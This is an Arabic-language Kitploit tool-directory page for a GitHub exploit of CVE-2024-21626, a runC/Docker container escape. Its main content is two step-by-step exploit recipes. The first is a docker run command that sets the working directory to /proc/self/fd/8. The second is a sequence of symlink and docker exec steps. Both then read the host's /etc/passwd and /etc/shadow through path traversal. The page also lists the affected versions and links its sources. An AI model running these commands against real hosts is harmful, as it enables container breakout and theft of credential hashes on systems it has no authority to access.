Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-21626 — استغلال فعال لثغرة CVE-2024-21626، وهي ثغرة هروب من حاوية runC/Docker عبر هجوم ارتباط رمزي على دليل العمل، مما يتيح الوصول إلى نظام الملفات المضيف. | Kitploit
أدوات/GitHubGitHub/flojboj/cve-2024-21626
تصعيد الامتيازاتأمن الحاوياتتحليل الثغرات الأمنيةالاستغلالأمن السحابةالهروب من الحاوية
GitHubflojboj/cve-2024-21626

CVE-2024-21626

استغلال فعال لثغرة CVE-2024-21626، وهي ثغرة هروب من حاوية runC/Docker عبر هجوم ارتباط رمزي على دليل العمل، مما يتيح الوصول إلى نظام الملفات المضيف.

عرض المستودع
1115منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-21626

الاستغلال (دليل العمل)

docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm

  • المهم وضع -w /proc/self/fd/8\
  • الوصول إلى نظام ملفات المضيف باستخدام cat ../../../../../../../../../etc/passwd داخل الحاوية

الاستغلال (الرابط الرمزي)

  1. docker run --name cve-2024-21626 --rm --it debian:bootworm
  2. داخل الحاوية - ln -sf /proc/self/fd/7/ /foo
  3. داخل الحاوية - ln -sf /proc/self/fd/8/ /bar
  4. docker exec -it -w /bar cve-2024-21626 sleep 120
  5. داخل الحاوية - ls -F /proc
  6. داخل الحاوية - cat /proc/9/cmdline (ابحث عن PID الخاص بأمر sleep)
  7. داخل الحاوية - cat /proc/9/cwd/../../../../../etc/shadow

النسخ المتأثرة

  • runC: >= 1.0.0-rc93 و <= 1.1.11.
  • containerd: >= 1.4.7 و <= 1.6.27، و >= 1.7.0 و <= 1.7.12.
  • Docker: تم إصلاحه في 25.0.2

المصدر

https://nitroc.org/en/posts/cve-2024-21626-illustrated/#exploit-via-setting-working-directory-to-procselffdfd https://labs.withsecure.com/publications/runc-working-directory-breakout--cve-2024-21626

تنزيل الأداة